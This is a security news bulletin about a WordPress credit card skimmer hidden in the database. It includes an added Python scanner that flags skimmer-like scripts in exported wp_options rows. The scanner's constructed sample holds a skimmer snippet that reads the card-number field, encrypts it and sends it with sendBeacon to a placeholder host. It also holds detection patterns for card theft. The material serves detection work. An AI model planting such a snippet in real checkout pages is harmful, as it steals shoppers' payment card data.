RH-ISAC: Sophisticated card skimmer targets WordPress checkout pages via database injection

Cybersecurity | Jan 2025 | RH-ISAC

What: Security researchers have identified a credit card skimmer that compromises WordPress e-commerce sites by planting its code in the site database rather than on disk, capturing card data during checkout while evading scanners that only look at files.


Why it is important: The emergence of this skimmer exposes a blind spot in retail payment-page security at a time when digital transactions represent 70% of global sales, threatening both merchant operations and customer trust.


A credit card skimmer detected as malware.magento_shoplift.273 has emerged as a significant threat to WordPress-based e-commerce sites. Rather than dropping a file on the server, the malware stores its malicious JavaScript in the site's database, in the widget_block entry of the wp_options table, where WordPress keeps the content of the block widgets it renders in the site's widget areas. Because the payload never exists as a file, file-integrity monitoring and malware scanners that only inspect the filesystem do not see it.


The skimmer activates only on checkout pages, where it either hooks the legitimate payment fields or injects a convincing fake credit card form to capture the data shoppers type. The stolen information, including credit card numbers, CVV codes and billing details, is Base64-encoded and encrypted with AES-CBC before being sent to attacker-controlled domains. Exfiltration uses the navigator.sendBeacon function, which posts the data in the background without blocking the page, so the shopper sees nothing unusual and the order completes normally. This is a particular challenge for the retail and hospitality sectors, where e-commerce platforms are crucial to daily operations.
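The two paragraphs above describe where the payload lives (the widget_block entry of wp_options) and how it behaves (checkout-only activation, card-field capture, AES-CBC and Base64 handling, navigator.sendBeacon exfiltration). The scanner below turns those traits into a database-side check; it is an added example written for this page, not code from Sucuri, RH-ISAC or the malware itself. It assumes the rows were exported with `SELECT option_name, option_value FROM wp_options WHERE option_name = 'widget_block';` (or `wp option get widget_block`) and that the skimmer keeps the traits the article lists; the sample rows, the `php_serialize_widget_block` helper, the indicator regexes and the `example.invalid` host are all constructed for the demonstration. It scans every row handed to it, so it can be pointed at the whole options table rather than only widget_block.

```python
"""Scan exported wp_options rows for inline <script> content with skimmer traits.

Added example (not from the article or from the malware). Sample rows are constructed.
"""
import re
from dataclasses import dataclass

# Inline scripts embedded in a serialized option value (block widgets store raw HTML).
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)

# Indicators drawn from the behaviour described in the article. Hypothetical patterns:
# tune them against a real dump before relying on them.
INDICATORS = {
    "checkout_gate": re.compile(r"location\.(?:href|pathname)[^;]{0,120}checkout", re.I),
    "card_fields": re.compile(r"card[_-]?number|cvv|cvc|expir", re.I),
    "aes_cbc": re.compile(r"\bAES\b|\bCBC\b|CryptoJS|crypto\.subtle", re.I),
    "base64": re.compile(r"\b(?:btoa|atob)\s*\("),
    "beacon": re.compile(r"navigator\.sendBeacon\s*\("),
    "external_host": re.compile(r"https?://[a-z0-9.-]+\.[a-z]{2,}", re.I),
}


@dataclass
class Finding:
    option_name: str
    indicators: tuple
    snippet: str


def scripts_in(option_value):
    """Return the body of every inline <script> found in one option value."""
    return [m.group(1) for m in SCRIPT_RE.finditer(option_value)]


def indicators_for(script_body):
    """Names of the indicators that match a script body, in INDICATORS order."""
    return tuple(name for name, rx in INDICATORS.items() if rx.search(script_body))


def is_skimmer_like(hits):
    """Flag only when capture traits and exfiltration traits occur together,
    or when most indicators fire; a lone external URL in a widget is normal."""
    hits = set(hits)
    exfil = {"beacon", "external_host"} & hits
    capture = {"checkout_gate", "card_fields"} & hits
    return bool(exfil and capture) or len(hits) >= 4


def scan_options(rows):
    """rows: iterable of (option_name, option_value). Returns Finding objects."""
    findings = []
    for option_name, option_value in rows:
        for body in scripts_in(option_value):
            hits = indicators_for(body)
            if is_skimmer_like(hits):
                findings.append(Finding(option_name, hits, body.strip()[:80]))
    return findings


def php_serialize_widget_block(contents):
    """Build a value shaped like WordPress's PHP-serialized widget_block option
    (length-prefixed strings, instance ids starting at 2). Used to construct samples."""
    parts = "".join(
        f'i:{i};a:1:{{s:7:"content";s:{len(c.encode())}:"{c}";}}'
        for i, c in enumerate(contents, start=2)
    )
    return f'a:{len(contents) + 1}:{{{parts}s:12:"_multiwidget";i:1;}}'


# Constructed samples: an ordinary paragraph widget and an HTML widget that imitates
# the traits the article describes. Not the real payload.
BENIGN = "<!-- wp:paragraph --><p>Free shipping on orders over $50.</p><!-- /wp:paragraph -->"
SUSPICIOUS = (
    '<!-- wp:html --><script>'
    'if(location.href.indexOf("checkout")!==-1){'
    'var f=document.querySelector("#card_number");'
    'var enc=CryptoJS.AES.encrypt(JSON.stringify({n:f.value}),k,{mode:CryptoJS.mode.CBC});'
    'navigator.sendBeacon("https://example.invalid/collect",btoa(enc));}'
    '</script><!-- /wp:html -->'
)
SAMPLE_ROWS = [
    ("widget_block", php_serialize_widget_block([BENIGN, SUSPICIOUS])),
    ("siteurl", "https://shop.example"),
]

if __name__ == "__main__":
    for f in scan_options(SAMPLE_ROWS):
        print(f"{f.option_name}: {', '.join(f.indicators)} :: {f.snippet}")
```

Run it against a real export by replacing SAMPLE_ROWS with the rows from the query in the lead-in. Any hit on widget_block deserves manual review of the full option value, since legitimate block widgets almost never carry inline scripts that mention card fields or sendBeacon; after cleanup, rotate admin credentials and check the other wp_options entries and the posts table, because the same database write access that planted this entry can plant others.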


IADS Notes: The discovery of this card skimmer marks a concerning step in the evolution of retail cybersecurity threats. In December 2024, Stripe blocked nearly 21 million fraudulent transactions worth USD 917 million during a single weekend, illustrating the scale of the payment-fraud problem. The skimmer's reliance on a compromised database recalls the June 2024 Neiman Marcus breach, in which attackers reached customer data through compromised cloud databases. With mobile transactions now accounting for 70% of global sales, this threat is particularly significant for retailers pursuing digital transformation while trying to maintain security.

